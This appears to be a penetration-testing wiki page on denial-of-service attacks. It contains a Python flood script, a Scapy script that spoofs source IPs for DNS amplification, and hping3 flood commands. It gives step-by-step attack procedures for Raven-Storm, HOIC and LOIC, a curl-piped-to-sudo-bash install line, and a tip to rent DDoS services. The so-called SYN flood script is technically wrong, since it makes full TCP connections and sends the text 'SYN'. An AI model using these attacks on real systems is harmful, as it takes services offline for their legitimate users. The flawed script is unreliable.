Denial of Service
Attacks on a computer or network that targets availability of the system and its resources to its legitimate users.
SYN flood attacks
SYN flooding exploits a vulnerability related to the typical implementation of the TCP three-way handshake. In this attack, the attacker floods the host system with an excessive number of SYN packets (requests). The speed at which these packets are sent exceeds the system's processing capacity. Typically, a connection is established through the TCP three-way handshake, and the host maintains a record of partially opened connections while it waits in a listening queue for acknowledgment (ACK) packets in response.
Just use Metasploit (auxiliary/dos/tcp/synflood) or make a small script like this:
import socket
import threading
# Server details
server_ip = "your_server_ip" # Replace with the actual server IP address
server_port = 80 # Replace with the actual server port
def syn_flood():
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
while True:
# Initiate the connection to the server
client_socket.connect((server_ip, server_port))
# Send SYN (Synchronize) packet to start the handshake
client_socket.send(b'SYN')
except Exception as e:
print("An error occurred:", str(e))
client_socket.close()
# Start multiple threads to simulate concurrent connections
num_threads = 10 # Adjust as needed
threads = []
for _ in range(num_threads):
thread = threading.Thread(target=syn_flood)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
Reflective DNS Attack
Reflective DNS attacks are flooding (D)DoS attacks which rely on the fact that the response of a DNS query is larger than the request and the possibility to spoof the sender IP address of the IP packet. This fact, that the replies are larger than the responses, makes it possible to amplify the amount of data an adversary can deliver to a target. By spoofing the source IP of the DNS request, it is possible for the attacker to have the response directed at the spoofed IP. Say that a DNS request has the size of 100 bytes and a response has the size of 200 bytes. Then the amount of data received by the target is 200 100 = 2 times more than what was initially sent by the attacker. We call this the amplification factor, which in this case is 2.
Not only will the attacker be able to amplify the flooding attack, the attacker also adds an additional layer of protection against being detected, since the attack will look like it comes from the DNS server and not directly from the attacker. Recall DNS being stateless.
Often these kinds of flooding attacks will be distributed. That is, the attacker will control a botnet, multiple devices, which then all at the same time will launch a reflective DNS attack against the same target. It is possible to use more than a single DNS server in these kinds of attacks if needed.
In the picture below, a reflective DNS attack is shown.

This code sends crafted DNS request packets to a specified DNS server (Google's DNS). It simulates a reflective DNS attack by requesting ANY type records for "google.com."
from scapy.all import *
target = 10.10.10.10
dns_server = "8.8.8.8" # This is Google's DNS server, change as needed
# Craft request packets
ip = IP(src=target, dst=dns_server)
udp = UDP(dport=53)
# Use whatever site that returns most data
dns = DNS(rd=1, qdcount=1, qd=DNSQR(qname="google.com", qtype=255)) #255 is ANY
request = (ip/udp/dns)
# Configure socket for speed up
s = conf.L3socket()
# Send packets
while True:
s.send(request)
Tools
First of all, with out a botnet most of the tools below will probably be powerful enough to disrupt any target unless it's some kind of IoT device.
It is far easier to pay for DDoS. Just search Google for "stress tester" or something similar. Obviously, these service are not marketed as DDoS services.
Hping3
Hping3 is a versatile command-line tool designed for network scanning, packet crafting, and testing TCP/IP protocols. It offers a wide range of capabilities, including ICMP echo requests, support for TCP, UDP, ICMP, and raw-IP protocols.
This command initiates the SYN flooding attack.
hping3 -S <Target IP Address> -a <Spoofable IP Address> -p <port> --flood
This command initiates the Ping of Death attack Note that this has not worked on anything but IoT devices for a long time.
hping3 -d 65538 -S -p 21 --flood <Target IP Address>
This command initiates an UDP application layer flood attack, here on the NetBIOS port 139. Note that "-2" specifies the UDP mode.
hping3 -2 -p 139 --flood <Target IP Address>
Here is a list of some of the UDP based application layer protocols that might be usable to flood a target
SNMPv2 (Port 161)
QOTD (Port 17)
RPC (Port 135)
SSDP (Port 1900)
CLDAP (Port 389)
TFTP (Port 69)
NetBIOS (Port 137,138,139)
NTP (Port 123)
Quake Network Protocol (Port 26000)
VoIP (Port 5060)
Raven-Storm
Raven-Storm is designed for conducting DDoS (Distributed Denial of Service) attacks. This Python3-based tool offers a range of attack options, including Layer 3, Layer 4, and Layer 7 attacks. Raven-Storm is versatile and can be customized for atypical targets, making it a powerful choice for conducting robust and tailored DDoS attacks during penetration testing.
Install: curl -s https://raw.githubusercontent.com/Taguar258/Raven-Storm/master/install.sh | sudo bash -s
To start Raven-Storm: sudo rst
Then to e.g. launch a layer 4 DoS attack:
Enter
l4
and press "Enter" to load the layer4 module..Specify the target IP address by entering
ip <Target IP>
Specify the target port by entering
port 80
Set the number of threads to 20,000 by entering
threads 20000
Finally, initiate the attack with
run
HOIC (High Orbit Ion Cannon)
HOIC is an open-source network stress testing tool designed for launching Distributed Denial of Service (DDoS) attacks. It generates a large volume of HTTP or UDP traffic.
Open the HOIC GUI main window and click the "+" button under the TARGETS section.
In the HOIC - [Target] pop-up, enter the target URL (e.g., http://[Target IP Address]) or just the IP address.
Slide the Power bar to the "High" setting.
In the Booster section, choose "GenericBoost.hoic" from the drop-down list and click "Add."
Set the THREADS value to 20 by clicking the ">" button until you reach the desired value.
Initiate the DDoS attack by clicking the "FIRE TEH LAZER!" button.
LOIC (Low Orbit Ion Cannon)
LOIC (Low Orbit Ion Cannon) is a network stress testing and DoS attack application. We can also call it an application-based DOS attack as it mostly targets web applications. We can use LOIC on a target site to flood the server with TCP packets, UDP packets, or HTTP requests with the intention of disrupting the service of a particular host.
Perform the following settings once LOIC is launched:
In the "Select your target" section, enter the target IP address in the IP field (e.g., 10.10.1.13) and click the "Lock on" button to add the target device.
In the "Attack options" section, choose "UDP" from the Method drop-down list. Set the number of threads to 10 in the Threads field. Position the power bar to the middle.
Initiate the attack by clicking the "IMMA CHARGIN MAH LAZER" button in the "Ready?" section.
Other Tools
HULK is a Python-based DDoS tool that focuses on overwhelming a web server with a high number of HTTP requests. It aims to exhaust server resources, making the target website temporarily or permanently unavailable.
Slowloris.py is a specialized DDoS tool that exploits a web server's limitations in handling concurrent connections. It sends incomplete HTTP requests, keeping connections open and gradually exhausting the server's resources.
Last updated